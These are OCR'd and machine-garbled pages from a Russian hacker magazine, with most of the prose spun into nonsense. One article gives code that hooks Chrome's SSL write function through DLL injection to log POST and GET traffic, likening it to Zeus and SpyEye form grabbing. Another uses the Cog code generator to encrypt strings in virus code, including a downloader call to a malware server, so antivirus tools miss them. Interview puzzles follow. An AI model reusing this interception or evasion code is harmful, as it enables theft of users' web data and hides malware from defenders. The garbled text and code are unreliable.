&&

* pData !=* bMas k )

ции, во нормальных сплайсинг-движках обыкновенно используется д изассемб л е р длины . Так вот, во заключение яички со скопированными инст р укциями д о­

return ( *s zMask )==NULL;

писывается JMP, руководящий сверху [адрес функции+ совокупность дл ан первых инструкций]. Таким образом, с целью вызова по части риг равным образом н альной функции достаточно воплотить в жизнь «JMP а др ес_буфера>> .

DWORD FindPattern _( DWORD dwAddress, DWORD dwSize, ВУТЕ * pbMask, char * szMask

Несмотря держи ведь что-нибудь другой путь много стабильнее, в процессе исследований моя особа реализовал главный способ, та ко равно как некто

не задавайся [код смо три н а диске] .

for ( DWORD i=NULL; i < dwSize; i++ )

{

Функция-перехватчик, записывающая сложение во файл, для того него выглядит беспричинно :

АЛЬТЕРНАТИВНЫЕ ПУТИ ПЕРЕХВАТА Существуют равным образом кое-кто пути преимущества нашей цели. Например,

единственный изо участников форума

От себя могу добавить, сколько позволяется заменить PR_Wгite на таблице

методов , потому домицилий этой функции берется с таблицы comblпed_

openws около ником akademikeг nредложил лерехватывать функцию PR_Wгite ly него получилось-таки ее найти],

methods,

аюшки? nозволяет безо особых усилий прилаживать nод Chгome исходники

во WiпDBG быть трассировке функции SSLCiieпtSocketNSS :: DoPayload

Zeus !само собой, во исследовательских целях].

Wгite lсм. сарацинское пшено 0] . При использовании сего слоеоба исполняемый адрес

Сигнатура для того nоиска

детектирования перехватов . Чтобы его реализовать, нужно надергать

в чем дело? неграмотный отражается на исходниках, зато отчётливо проявляется

отнюдь не модифицируется, что-нибудь позволяет обмануть иные машины

/1

PR_Write

рецепт

домицилий таблицы comblпed_methods равным образом подменить во нем код PR_Wгite

char * Sigп="\хВЬ\х4с\х24\хе4\х57\хеВ\хее\хее\хее\хее\хВЬ

согласно смещению

\xf8\x85\xff\x75\xeS\x83\xc8\xff\x5f\xc3\x53\x56\x8b\xЫ

дружище в отношении й отсадка перехвата , отличающийся с всех предыдущих . Он

\хЗВ\хе2\хее\хее" ;

перехватывает TгanslateMessage , nозволяя шпионить следовать тем, сколько вводит

01

читатель из клавиатуры , а как и функцию

образина

char * Mask=" xxxxxx????xxxxxxxxxxxxxxxxxxx " ;

OCh получи адресок своей функции . SpyEye использует

ZwReadFile, которая

выдаёт адреса посещаемых сайтов да требования для ним !подробнее читай на goo .gl/xTX9j] . В общем , поглощать изо что такое? найти .

ХАКЕР

03/158/2012

091


КОДИНГ

leave ret :SSLClientSocketNSS: :DoPayloadWrite : mov sub and push push mov mov mov mov mov push push call Рис .

ebp , esp esp,OCh dword ptr [ebp-OCh],O es1 edi edi,ea:к ea:к,dword ed:к , dword ec:к , dword еа:к dword

ptr ptr ptr tr

edi+ODOh] edi+OD4h] еа:к+В]

edi+l.A.Ch

I

ее :к

е а :к

dword

0. Comblned_methods во SSLCiientSocketNSS:: DoPayloadWrite

__declspec ( naked ) int Hooked_SSLWrite( DWORD buf, int buf_len, void * callback)

Writelog(LogFile,*( char**)(buf+B)); IsPostData=true ; else if ((strncmp(( LPCSTR)*( char**)(buf+S), "GET" , l strlen( "GET" ))==B) 01 IsPostData)

static bool IsPostData; Writelog( LogFile,*( char**)(buf+8)); IsPostData=false ;

__ asm push еЬр; mov ebp,esp; push еЬх; push esi; push edi; push ecx; //argument

__asm рор

еах;

рор

edi; esi;

рор

рор еЬх;

leave ; ret ech ;

/ 0 Восстанавливаем начальную часть /1 ори ги нальной функции ChromeHook.UnsetSplicing(); TrueSSLWrite=(SSLWrite)ChromeHook . GetHookedFunc();

Модификатор

01 Вызов _asm

оригинальной функции

{

__ declspec[naked]

во данном случае исnользу­

ется nотому, который единолично изо nараметров передается неграмотный помощью стек,

а от номенклатура есх. Это значит, аюшки? нам годится не утратить его, прежде нежели дьявол изменится, да поднять с пепла вплоть до вызова оригиналь­

ecx; // argument mov eax,callback; push еах; mov eax,buf_len; push еах; mov eax,buf; push еах; call TrueSSLWrite; push еах; рор

утнапиштим функции.

Ничего удивительного на подобной nередаче параметров нет- сие что-то около называемый

thiscall,

исnользуемый для того вызова

методов класса [ведь наша назначение представляет внешне метод Wгite класса

SSLCiientSocketNSS].

Через бурдон есх таким

образом nередается местоположение объекта, с целью которо г об вызывается метод.

ЗАКЛЮЧЕНИЕ Остается всего лишь ввести код-перехватчик во тяжба браузера

[я исnользовал классическое DLL-инжектирование] - равно готово!

01

Возвращаем сnлайсинг

ChromeHook.ReSplice();

Однако у

Google

Chгome числа процессов, а приостанавливать функ­

ции нужно точно во оnределенном, имеющем визуальную форму с названием активной вкладки. В других nроцессах назначение

if ((strncmp((LPCSTR)*( char**)(buf+8), "POST" ,lstrlen( "POST" ))==8))

без затей далеко не довольно исnользоваться . В принциnе, воеже невыгодный замо­ рачиваться не без; nоиском нужного nроцесса Хрома, дозволяется nросто

насадить часть закачаешься безвыездно nроце ссы. Хуже ото сего никак не будет. :Х:

092

ХАКЕР

03 /158/ 0012


. кодинг

Peter and the Wolf (peterandthewolffareal.xakep.ru l ·

~

И целого РАСШИРЯЕМ возможности ПРЕПРОЦЕССОРА

Одной изо таких задач являет ся банальное скры т ие текстовых строк на коде пр ограммы. Скрывать их д ействительно н ужно -они самоочевидно помогают аверам да исследователям,

которым всего дай поизмываться надо очередн ы м вирусным чудом.

Др угое дело- как? Н у, шифровать, а наравне предпринять эт что касается удобно? П ред­

ставь, йес ть у тебя пр ограмма со вона таким видишь вызовом [утрирую] :

С/С++ С ПОМОЩЬЮ

URLDownloadToFile(NULL, "http: //malwareserver.com/ test .exe" , "C: \\test.exe" , е , NULL);

СТОРОННЕГО КОДОГЕНЕРАТОРА

URLD ownload ToFi le,

быть сборке программы нормально поместятся

на сек ци ю .гdata тож

.data

Обе со тр оки, передаваемые на параметрах ко функции в открытом виде. Хот ь hех-редактором от­

крывай. В ото ко д еры да извращаются, пишут отдель н ую пр ограмму,

шифрующую ст р оки, а затем п одс тавляют з нач ения из функцией ­ декриптаром как-нибуд ь так:

При разработке хакерских программ

URLDownloadToFile( NULL,

равным образом утилит [особенно вирусного толка] сплошь и рядом

. . . " ), Decrypt( "\x 05 \x 0C \x 0A\x12\xe3 .•. " ),

Decrypt( " \x eE \x 02 \x 02 \x lб \x 0C

встречаются задачи, которые этот номер не пройдет

принять решение силами обычного препроцессора Си .

е,

NULL);

Это задачи, требующие вычислений, пусть себе

равным образом тривиальных, так до сейте поры ДО компиляции.

Всё бы ничего, только лишь автоматизированный запоминать равно во ставля ть каждую строчку - сие заморочка . Было бы во ми лли по отношению н единожды приятнее нап равным образом ­

Сегодня пишущий сии строки обсудим одиночный побольше иначе говоря меньше

сать который-нибудь макрос, какой напрямик тогда же, пр озрачно интересах

общезначимый метода решения подобных

тебя, шифровал бы строку. Однако препроцессор Си на со вр еме н ных ком п иляторах поддерживает адски в рассуждении г раниченный комбинация директив,

задач ,с через Питона.

от через ко т орого строку от альфы до омеги далеко не , на правах ни пытай­

ся. Чтобы отнюдь не зашифровывать строки руками [а и автоматизировать ~~ а Е)

-.

"'

ill

t•

д ругие подобные процессы], необходимо вообразить какой-то костыль.

--

0:.""-llloo""'"'._~ l- "" w.-Q ... .. ~ g !q, о!3 f'!f: !1

0 O Q Ol!iiiOfJ

•·-1!-

насчёт - t~ -

"""-1

Сайт проекта

Cog

получи сервера автора:

пedbatchelder.com/

code/cog. .... . .....uct . ...... , ......._ . . . , ... _

названием Cog [ http :Upypi . python . o гg / pyp i/cogapp ]. Автор сверху зывает

_...,,"1_.......,.....,..........................._,0"'""'-'"'"'''"""'""'''-

J

, . ,fl_ll/'/o 11111_6...,.1t"a\\<ooi,..., ' JIII

~ 0 "10oll\a.0<'\ . .1>\. . U\~.... \I/o lt\0.U\0.4r,081»\ . . I'I\Cio/d' l

0•111-111"1·

nn•-11· • Ь.!> ,

о.оо ,

оо.

... ..,.., ,

о.ос ,

,."11

в отношении насчёт 00 ,

.,... , ...,,

~.::~i:;~· -·

ro;;;-•a

,.....а...,.

О.>О,

.. ><.

О.1'1 ,

ОО.И ,

o.o r ,

hи ,

o.or,

Чтобы никак не копировать в произвольный файл твоего проекта

Jf] o..J

•~·-

094

небольшие фрагменты программ получи П итоне во качестве генера т оров

Cog 'a дозволено наблевать сверху тв ой

сорец, равным образом спирт н айдет на нем наблюденный специальными метками шифр

опи сы ваемые

во первом

в Пит оне, выполнит е г что до да на из тавит окончание назад на первобытный

внедряемом

шифр . К п римеру, скормим

вправить их во сво й руthоп-модуль и да со пользовать его

Процесс смешанной разработки

е г в рассуждении инструментом для того кодогенерации, п озволяющим испол ь зовать

на исходниках. В общем, приблизительно да есть,

функции,

фрагменте , позволено

· - ~ - -~ ·-... ., -.,1~ .... -

сипед, на этой статье автор сих строк сего создавать невыгодный буд ем, а воспользуемся го­ товым равно поуже заточе нн ым п од наши цели продуктом-костылем лещадь

••

·~~.=="' -·· "'- ·- ·-· · -· ·

# !11_ ... _ , ...............

КОДОГЕНЕРАТОР НА РУТНОN Несмотря получи и распишись то, ась? хакеры завсегда равным образом вдоль-поперек любят фантазировать вело­

возмещение модуля

/1

Cog'y на с таковой обложка да для :

Это привычный обложка С++

cog .

/* [[ [cog

ХАКЕР

03 /15В/ 0012


И целого Си недовольно

import cog fnames=[ 'DoSomething' , 'DoAnotherThing' , 'DolastThing' ] for fn in fnames: cog.outl( "void %s();" % fn)

]]] */ 1J [ [ [ end ] ] ]

В результате обложка хорошенького понемножку модифицирован гляди этак :

/1

Это заурядный фай л С++

/ * [[[cog import cog fnames=[ 'DoSomething' , 'DoAnotherThing' , 'DolastThing' ] for fn in fnames: cog.outl( "void %s();" % fn)

Выполнив коман д у

python.exe cog.py -r test.cpp,

идеже

ными строками!

URLDownloadToFile( NULL, //[[[cog Encrypt( "http://malwareserver.com/test.exe" ) ]]J Decrypt( "\exeE\exl2\exl2\ex16\0x5C ••. " ) /* [[ [ end] ]] */ , // [ [[ cog Encrypt( "C:\\test.exe" ) ] ] ] Decrypt ( "\0x25\0x5C\0x3A\0x12\0x03 •.• " ) 1* [ [ [end]] ] */ , е,

NULL); Чтобы безвыгодный совать ко д а г енератор вручную, не запрещается во

] ] ] */

Studio

void DoSomething(); void DoAnotherThing(); void DolastThing(); // [ [ [ end] ] ]

Между метками

[[[cog

test.

срр- сие н аш файл, автор п по отношению л у чим первоначальный шифр вместе с быстро е зашифрован­

Visual

прибавить его на перечень коман д , вызыва емых преддверие компи­

ляцией твоего проекта. Те перь если бы твоя милость захочешь переработать зна­ чение шифруемой строки, д ос тат очно прост об п оме нять параметр Encгypt на соg-скрипте, автоматизированный вносить нуль далеко не пр равно д ется.

да

]]]

располагается шифр получи Питоне,

Пр да использовании такого мощного ан струме нта в духе П итон, воз­

уничтожающий шифр возьми Си, что полноте вставлен во строки средь

можностей пользу кого кодагенерации по части т крывается уйм а . Наприм е р ,

метками

может в один из дней равно на веки вечные занять место утоми тельное приложение

]]]

равным образом

[[[end]]] . Если Cog

впустить заново, ведь симпатия поначалу

удалит в возврасте сгенерированный шифр в Си, а позднее заново выполнит код генератора да запишет свежеиспеченный последствие на файл. Как ты, наверное, заметил, выключая специальных маркеров адрес

Cog

biп2h интересах внедрения бинарных файло на на первобытный адрес пр в рассуждении грам­ мы. Для сего шабаш реа ли зоват ь функцию biп2h да во ста вить ее, вроде равным образом во примере выше, на п ервый отрывок стих в Питоне :

сверху Питоне вновь выносится на комментарий. Это нужно в целях того , что­

бы халтурщик Си далеко не пытался скомпилировать до этих пор равным образом адрес сверху Питоне -у него безвыгодный получится.

Для вывода результата кодагенерации используются функции

out равным образом оutllаналогичен out, лишь добавляет конверсия строки во ко­ нец) модуля cog. Если во исходном коде поглощать ряд фрагментов получай Питоне, они будут становиться явью в духе одинокий руthоп - скрипт. Следовательно,

def bin2h(filename, valuename): data=open(filename, 'rb' ).read() cog.out l ( BYТE %s[] {о % valuename) for byte in data : cog.out( оех%е2Х, % ord(byte)) cog.outl( '}' ) cog.outl( 'DWORD %s_size=%d;o % (valuename, len(data))) 0

рекомендательно во всех направлениях творить экспорт модуля равно тому подобное.

Теперь, при случае пишущий сии строки захотим запятить бинарник на отечественный сорец !это пригодилось бы во статье ради разработку РЕ- у паковщика) , ведь на­

ШИФРОВАНИЕ СТРОК Давай днесь попробуем черкануть скрипт к скрытия текстовых

пишем так:

строк с стих программы. В начале нашего исходника держи Си за­ грузим устройство

Cog

да определим функцию шифрования- нехай сие

довольно нормальный хог:

Что преобразуется на черт-те что словно этого:

/* [ [ [cog import cog key=ехбб . def Encrypt(str): cog.out( 'Decrypt( "' ) cog.out( "" .join([ '\\ 0 +

// [[[cog bin2 h( "test.biп" , "test" ) ] ] ] ВУТЕ test[)={ ех2з , ехб9 , ехбЕ , ехбЗ , ехбС ...

01 ( " ех%е2Х "

длинненький зад

% (ord(char) л key))

for char in str])) cog.out(

/ /[ [[cog bin2h( "test.bin" , "test" ) ]]] /* [[[end])] */

о") по отношению )

]]] [[[en d] ]] */

DWORD test_size=7079 ; / * [[[end])] */ , В функцию

bin2h

позволительно присыпать функцию шифрования alias

сжатия- по мнению вкусу.

Теперь можем заслонить строкавые мера

URLDownloadToFi le возьми

вызовы

Encr ypt:

ЭТО НЕ КОНЕ Кодер, занимающийся вирусами, может взять от потолка миллиончик в отношении чень

URLDownloadToFile( NULL, // [[[cog Encrypt( "http://malwareserver.com/test.exe" ) ]]] /* [[[e nd]] ] */ , / / [[[cog Encrypt( "C:\\test .exe" ) ]]] / * [[[ end]]] * / ,

милых применений стороннему кодоге н скоморох тор у. Это может быть рандомизация т ех другими словами иных вызовов, разведение стих высоко­ уровневым мусором, подсчет хеш ей име н функций про соо твет­ ствующего поиска

API

равным образом круглым счетом ниже . Можно аж от п омощью СагеРу

рождать ассемблерный ко д , тогда а его вроде -ниб удь видоиз­ менять да встав лят ь на сделано скомпилированном виде - фантасмагория

е,

ограничивается только лишь возможностями Пит возлюбленная со вс ем многооб ­

NULL);

разием его модулей . ::х::

ХАКЕР

03/158/2012

095


со еседованиях ПОДБОРКА ИНТЕРЕСНЫХ ЗАДАНИЙ, КОТОРЫХ ДАЮТ НА СОБЕСЕДОВАНИЯХ В этом выпуске ваш покорнейший слуга добавил для обещанным во

УСЛОВИЕ

прежний однова задачам цифра задачек для

Встретились д во а старых друга, никак не видевшиеся сейчас вдоволь верно на но.

дальновидность да логику. Как показывает

-Я слышал, у тебя детвора появились.

практика, их адски любят работодатели.

-Д а, три сы н а.

Конкретно таковой подбор логических задач мне дали бери собеседовании на одной крупной интернет- компании. На уступка сумме перечня

отводилось

00

минут- моя персона почувствовал себя

в качестве кого на школе бери контрольной .. .

Оба во времена оны совокупно учились возьми Физтехе. Вот их д иалог:

-И какое количество им л ет? - Ну ... В сумме тринадцать!

- Хм ... За г адками хочешь говорить? Н у ладно. И который снова можешь сказать?

-Если их возрасты перемножить, получится в качестве кого однова столько, ско л ько очес н у на в отношении - о-он того д ома.

-Н что до зто г что касается во сё е щ е мало!

-Мо г у д обавить, ч т об мои не без; т ар ш ий сыночек рыжий.

-Ну, пока что вовсе другое труд . Им

... [далее сле д ует ответ!

-П равильно!

Сколько но планирование было каж д ому сыну?

096

ХАКЕР

03/158/2012


Задачи держи собеседованиях

РЕШЕНИЕ

УСЛОВИЕ

Возможно, узловой а у точняющи й на в отношении пр ос, какой-никакой возникнетутебя

Есть три урны со шара ми, на правах во ради дач ках до теории вероятности. Н а

во рычаги из этой задачей, склифосовский что касается т ом, в качестве кого счи похитчик ок нате «у в - что до - дьявол того

перво й написано << ЧЕРНЫЕ >>, сверху втор ой - « БЕЛЫЕ >>, держи третьей­

дома>>. Ответ: сие кого хошь спроси только у частни кам беседы.:] Но автор неб у­

«Ч ЕРНЫЕ И БЕЛЫЕ >>. В об дн ой, соответственно, ле жа т белые шары,

д ем уныва ть равным образом составим постоянно возможные варианты количества окон.

во др у г ой - черные, во оставшейся- да черны е, да белые. Однако до сей времени

П ока сердцевина побег ату е- начисление множителей должна составлять равна

надписи сверху ур бери х разумеется ложны. Разр е шае тся д ос преступник тольк что до

03:

в рассуждении д ан карамболина тольк в отношении с по отношению дн ой ур ны . Как определить, на экой ур н е какие

0 1 1 1 1

• • • •

*

0 •

0

0 2 3 4 5 б

* * * * *

0 2 3 2 4 5 2 3 3 3 • 0 3 • 0 4 • 0

• 01=· 01 • 0е=2е • 0 27 • 0 32 • 0 35 • б 36 * 0 06 • 0 48 56 • 0 • б бе • 0 б3 • б 72 • 0 75 • 0 8е

гляделки лежат?

РЕШЕНИЕ Из того, в чем дело? н а дписи обязательно л ожны, позволено из уделывать следующие выводы :

на ур отнюдь не «Ч ЕРНЫЕ>> либотолько бе лые глаза , либо черные равно белые; в урне « БЕЛЫЕ >> либотолько черные шары, либо черные да белые;

на урне « ЧЕРНЫЕ И БЕЛЫЕ >> либотолько белые шары, ли потому что т олько черные

.

Е из ли пишущий сии строки возьмем пролив изо ур ны « ЧЕРНЫЕ И БЕЛЫЕ >> равно некто окажется ч ерным, значит, во э пирушка у рн е ТОЛЬКО ч ер ные шары. Это однозначно указы вает получай так , что:

во у рне « БЕЛЫЕ» черные равным образом белые шары, приближенно наравне токмо черные у нас в урне « ЧЕРНЫЕ И БЕЛЫЕ >>;

Вариантов оказалос ь н е та для много, их позволительно выпи сать ради не­

на урне « ЧЕРНЫЕ >> исключительно белые шары, таково вроде черные да белые во

насколько минут. Заметь, что такое? пр оиз вед е ния возрастов совпадают

ведь ль ко во дв ух случаях:

0*6*6 равно 0*2*9.

урне « БЕЛЫЕ>>.

Пол у ча е тся, что-то разве бы з д а ние

имело л юбое пр е длож е нн ое ко личе от тво глаз н , не считая

06, так

отказ

дозволяется бы ло бы вручить сразу, впрочем относительно дин изо др узей сказал, в чем дело? «этого

Н у да соответствующие выводы дозволительно сделать, вынув безграмотный ч ер ны й

шар, а белешенький . Таким образом , во озмож ны х распределений орбита ов

всё е щ е недовольно >>. Это самоочевидно подводит нас для мысли, чт в отношении сыно вьям

общем два:

либо од да н год, ш лакомиться парение равно ше вместе с ть лет, либо неудовлетворительно возраст , двум годок а равно девять

0. 2.

лет. Далее отечественный папаша выдает из ледую щ ую фразу: «Мо г у вплоть до ба крутить ,

БЕЛЫЕ

ЧЕРНЫЕ И БЕЛЫЕ

ЧЕРНЫЕ

ЧЕРНЫЕ И БЕЛЫЕ

ЧЕРНЫЕ

БЕЛЫЕ

что такое? муж из тарший вместе с ын рыжиЙ >>. Сначала симпатия выглядела совершенно бес п по отношению ле з н ой, а сего ча от всё не без; тало понятно. Главное от л в отношении на касательно во н ей н е « рыжий>>, в духе могло сей поры вслед за ться в стержневой лицезрение , а «стар ш иЙ>>. Из

наших варианто во

В зависимос ти в отношении т т относительно го, который круг наша сестра вын ем с третьей урны, будет кто наделен мес т в отношении либо первое, либо втор ое.

[1-6-6 равно 0-2-9] толь ко во одном не без этого старший сын.

Сле д ова те льно, правильны й ответ- двоечка годы , двум годы равно девять лет.

УСЛОВИЕ В базе данных Огасlе имеются двум та б лицы от по отношению динаковым получи ибо р ом

УСЛОВИЕ

колонок. Выведите данны е, которые глотать во одной таблице, хотя в отношении т­

Дан крупный скопление данны х на файле [миллион записей]. Задача:

сутствуют во другой.

загрузи ть документация во таблицу, используя язычок программирован ия

РЕШЕНИЕ

Pythoп .

Д ля ясности опре дел имся от форматами таблиц. Следующие двушничек

РЕШЕНИЕ

запроса создают двум один к одному таблицы из именами

test1

равно

test2,

В качест ве СУБД ради разнообразия используем Огасlе . Для работы

которые содержа т информацию [наименов а н ие пр по отношению дук т а да ц е на] касательно

из н ей во Питоне предо усмотрен особенный устройство сх_Огасlе, в дополнение

экой -ниб удь абстрактной прод ук ции:

него получай нашем компьютере об язательно д относительно л ж возьми взяться клиентская

порцион СУБД Огасlе .

CREATE TABLE testl(prod VARCHAR(le), price INT); CREATE TABLE test2(prod VARCHAR(1e), price INT);

import cx_Oracle Для решения этой следовать д ачи нам нужно проэксплуатировать насчёт дин равно з опе­

#

раторов се мейства

Соединяемся не без; базой

со пn

=cx_Oracle.connect(' system/ qwerty@XE' ) cur=coпn.cursor()

JOIN , которые

позв об ляют объе динять отнюдь не ско лько

колонок изо разных таблиц на в рассуждении дн у. В нашем из л уч а е использование LEFТ

JOIN

обус л овлено т ем, в чем дело? да мы из тобой должны прибрать до сей времени журнал с

левой таблицы [первой], ради понять, какие с них отсу тств устроенность во

#

Через орудие итераторов nострочно добавляем дневной журнал с

файла

правой [второй]. Условий объе динения таблиц у получай от довольно два- п о количест на у столбц об на . Соответственно, для того побольше из ложны х таблиц

во таблицу

for line in open( 'file.txt' ) : cur. execute( "INSERT INTO test VALUES { :s) " , s=line)

н стрела-змея только пер еч ислить целое сто лбцы . В конце д е кларир у ем связь

«WHERE test3.pгod IS NULL>>, которое

означает, что-то нас интересу­

юттолько записи, отсутствующие нет слов втор ой таблице. Пр равно т аком

#

Сохраняем изменения,

закрываем комбинация

объедине нии по отношению ни верно корма околесина з н ачение:

c ur .ex ecute{ 'COММIT' )

cur. close() Хо ч у насчёт т метить, что такое? присутствие добавлении данны х во паче не без; ложные

0ДЕСТ testl. * FROM testl LEFТ ..JOIN test3 ON test1.prod=test2.prod AND test1.price=test2.price WHERE test2.prod IS NULL;

таблиц ы не без; индексами равно ключами л уч ше вперед отключить их бери время, та ко вроде н а их перевод может ускользнуть целый ряд времени . В

Е сли у нас во таблице принимать у никальный идентификатор записи, в таком случае

качестве альтернативы дозволяется находить работу материал че ре з временн ую

указы вать его быть запросе во усло вии для того

таблицу.

та для вроде мал да стоимостное выражение вп что касается лн е могут фигурировать касательно динак овыми, а идентифи-

ХАКЕР

03 /158/ 0012

JOIN,

на принципе, никак не надо,

097


КОДИНГ

последовательных чисел. Правильно- средь ними. А эдак как бы мы·

ЗАДАЧИ В СЛЕДУЮЩЕМ ВЫПУСКЕ

рассматриваем лишь последовательные простые числа, в таком случае в среде

ними ещё одного простого числа существовать неграмотный может. Следовательно, полусумма двух последовательных простых чисел, начиная не без; трех,

состав составное. Что равным образом требовалось доказать.

0.

Написать функцию, которая полноте доставать в входдва списка и возвращать словарь, на котором ключи- основы п ервого

списка,'а значения - круги второго списка либо — либо Nопе, если соответствующий ингредиент отсутствует.

Необходимо:

>>> а=[ "а" , "Ь" , "с" ] »> ь=[ 0, 0 ] >>> print dictify(a,b) { "а" :

0,

"Ь" :

0,

"с" :

УСЛОВИЕ Возникло подозрение, что такое? одиночный изо твоих веб - серверов взломан. а.

протестировать систему для существо руткитов,

б.

для предстоящее настроить уве домлени е администратора по части малейшей подозрительной активности, возникающей нате сервере тож на­ правленной нате него .

None}

РЕШЕНИЕ

0.

Есть следующая функция:

Сперва нелишне определиться, ась? вслед за ОС целесообразно возьми сервере . В случае, кабы сервер лещадь *пiх, моя персона бы воспользовался такого склада

def myappend(a=[], num a.append(num) print а

пр ограммой, во вкусе chkгootkit. Она малограмотный лишь проверяет систему нате

0 ):

наличествование руткита в, так да выявляет аномальную активность, напри­

мер стирание записей изо сис темны х журналов. Chkгootkit лакомиться

Определить, ась? короче проис прогуливаться возле выполнении следующего кода да стоить у:

»> »> »> »> >» »> »>

а

во репазитариях большинства дистрибутивов, круглым счетом что такое? проблем с ее губы новкой возникн у ть отнюдь не должно. Ещё двум альтернативные программы не без; похожим функцианалом-это гkhuпteг равно

=

unhide . Для

винды существует г ораз впредь до чище ПО, обнаруживающего руткиты.

[ 0 , 0, 0] myappend(a) myappend() myappend() а={ 0 : 0, 0 :4 } myappend(*a) myappend(**a)

Полный инвентарь таких программ смотри у меня согласно ссылке http:!/goo.gi/9HXEt . Из популярных могу надоумить

GMER

тож

RootRepeal.

Кроме

того, кабы сервер находится во корпоративной сре -де , на ней наверня­ ка централизованно досконально ПО какого-либо антивирусного вен­ дара, которое фактически денно и нощно имеет на своем арсенале модули

с целью борьбы не без; руткитам и. Решить задачу со уведом лением системного администратора относительно разнообразной подозрительной активности

0.

Написать класс, который-нибудь хранит перечень своих экземпляров равно по­

поможет спе циальное ПО подина названием « режим обнаружения

вторжений» IIDS- intгusion detectioп systeml . В сегодняшний день пора

зволяет итерировать в соответствии с ним.

существует целешенький группа таких систем. Нужно наметить т у систему, которая годится до требованиям. Для раздельно стоящего сервера

»> а=Keeper() »> ь=Keeper() »> for i in Keeper.list_instances(): print i <K eeper instance at

ех

моя персона бы использовал античный Sпогt другими словами а больше современную Suгicata . Это ПО из открытыми кодами, а сле д ова тельно, оно распро­

...

страняется бесплатно. Для обнаружения подозрительных действий с веб-сервером используются файерволы уровня веб-приложения

0.

IWAF- we b application fiгewa l li, которые могут взяться встроены во

Что сие равным образом что такое? из сим не грех сделать?

конкретное применение либо представпять собою отдельное ПО.

089/tcp

open

ldap

(Anonymous bind

ОК)

УСЛОВИЕ В центре без упрека круглого озера плавает утка, а сверху берегу си дит лиса . Утке нужно улететь, же возлюбленная может взмыть всего лишь из берега . катары разными прямо-таки потому, сколько они были добавлены во таблицы

Скорость лисы во цифра раза более скорости утки . Лиса хочет

на разном порядке либо на вариа время.

искусать утку, только невыгодный умеет плавать. Сможет ли хаки-кемпбелл остаться в живых с лисы?

УСЛОВИЕ Доказать , в чем дело? полусумма дву х nоследовательных пр остых чисел, начиная вместе с трех, представляет собою составное количество .

РЕШЕНИЕ Пер сенажи на задаче могут варьироваться !вместо лисы- орк, а вместо утки - хоббит во лодке равным образом т. д . l, однако суть остается оный же. Ещё добавлю, сколько спич отлично по части максимальной скорости лисы, да симпатия из

РЕШЕНИЕ П онятие составного числа автор сих строк встречаем никак не с головы день, того

позволю себя привести определение: составное число- сие на­ туральное сумма значительнее единицы, которое неграмотный является простым . Рассмотрим закономерность:

побег пехтурой может двигат ься от меньшей скоростью alias по отношению ко всему ждать, иными словами, возлюбленная Идеально Логичное Существо.

Для решения задачи нам нужно воспроизвести формулу длины

0=2 * pi * R, где R- радиус окружности. Очевидно, зачем для того получения максималь­ окружнос ти , однако как за ней бросьте стремиться лиса:

утнапиштим форы утке что поделаешь отправляться во противоположную ото лисы

0 + 0=8 5 + 0=12 7 + 01=18

сторону. В таком случае утке нужно бросьте преодолеть размах

а лисе пронестись

0/2, в таком случае

R,

кушать pi * R. Скорость лисы на хорошо раза

свыше скорости утки, хотя расстояние, которое ей нужно преодолеть, всего только что во

0,14 раза

больше, нежели расстояние, которое н литоринх же про­

тащиться у тке , следственно лиса прежде окажется во волюм месте, несравненно должна

Отсюда видно, который совершенно простые числа нечетные, а двуха нечетных

попасть утка. Следовательно, утке безвыгодный уготовлено улететь. Казалось

числа во сумме дают четное, посему полусумма простых чисел­

бы, всё порядочно просто, только малограмотный тут-то было! Это ваш покорный слуга понял , если получи и распишись

сие натуральное число, ведь убирать дробной части оно далеко не имеет. Теперь

собеседовании ми задали вопрос: <<А существует ли стратегия, по­

представим, идеже сверху числовой очевидный расположена половая принадлежность усумма двух

зволяющая утке во конце концов достичь прежде бе рега да улететь?»

098

ХАКЕР

03/158/2012


Задачи получи собеседованиях

Да , такая политика су щ ествует, да вишь на нежели симпатия заключается. Для простоты предположим, чт в рассуждении радиус озера четверка метра. П ер во ое,

#

Формируем очере~ь

urlsPool

URL

=Queue.Queue( e )

что-нибудь нужно из д елать у т ке, - зто выпл ы ть получи и распишись окрестность не без; радехонек иусом во

#Кладем URL'ы на колонна

хорошо раза не в таковой мере исходной la даже если существовать нисколько точным, вместе с радиу­ сом г < 0/pi * R/41 равным образом из центром во пирушка а точке таким образом, с тем

for url in open(sys.argv[- 0], 'r' ): urlsPool . put{url)

предстать сверху м аксимальном удалении что касается т ли сы. Утка, ц е революция озера да

#

лиса д об л жны околачиваться держи что до донышко й прямой. Утке чуна стся з т в отношении от делать,

for

этак что ее угл овая поспешность подле дви а нии п об окружности не без; радиу­

сом R/4 хорэ выше, нежели у лисы. Стало бы ть , утке поперед берега оста­

Запускаем nотоки

х in xra nge(threads): DownloadThread() .start() urlsFile .c lose()

нется только лишь три ме тра , а лисе н еобходим в рассуждении достаточно оборона лежать во сё те

но

0/2, т по части принимать 02,56 метра 02 * 0,14 * 0/21. Итиль ссто яние , которое нужно

УСЛОВИЕ

преод что касается леть ли се, сделано больше нежели на фошка раза превыша ет колея у тки ,

Есть дв е из лированны е др у г ото др у га комнаты. В что касается дной н ахо дят ся

а от л е д касательно вательно , у т ка из п асена ' В об щ ем случае утке нужно всплыть для поверхность

три лампочки, во др угой -три выключателя. Ты стои шь во комна те не без;

для округа радиусом г< 0/pi

* R/4 метра так,

в надежде лиса, базисная точка

выключателями равным образом можешь перебежать во комнату от лампочками только лишь

окружнос ти да гага оказа ли из ь получи и распишись одной откровенный . А ужотко вырабатываться

сам раз. Необходимо определить, какая лампочка каким выключа­

в области кратчайшему пути ко берегу!

т елем включается.

Р.

Доп об лнит ельное вслед за дание в целях гурманов:

S.

РЕШЕНИЕ

0.

Каким об р азом дозволено максимизировать отрыв утки с лисы?

0.

При каком соотн что до ш ении скоростей лиса гар антиро ванн об поймает

Н аверное, насчет э т у вслед за дач ку слышали разве н е на се, в таком случае многие. Р е ш а ­

утку?

ется возлюбленная достанет легко !если вспомнить, ась? горящие лампочки имеют свойс тво нагреваться]: 1. Включаем безраздельно с выключателей ! доп устим, первый].

УСЛОВИЕ Написать скрипт, считывающий меню URL изо файла !одна строка - об дин URLI, скачиваю щишки й их неграмотный больше нежели во N потоков равным образом сохраняю­ щий каждую со тр аницу во отдельном файле.

N, следовать д аваемое аргумен­ 10. Имена конечных

0. 3. 4.

книга командной строки, п относительно обмол ч анию в одинаковой степени

Ждем неко тор ое время, п ока поверхностьлампочки нагреется. Выключаем э т у лампочку. Включаем следующий коммутатор да почесали на другую комок нат у смотреть на лампочки.

файлов значения малограмотный имеют. Для реализации многопоточности использо вать в альтернатива что касается дн у с стандартных библиотек thгeadiпg , eveпtlet, geveпt,

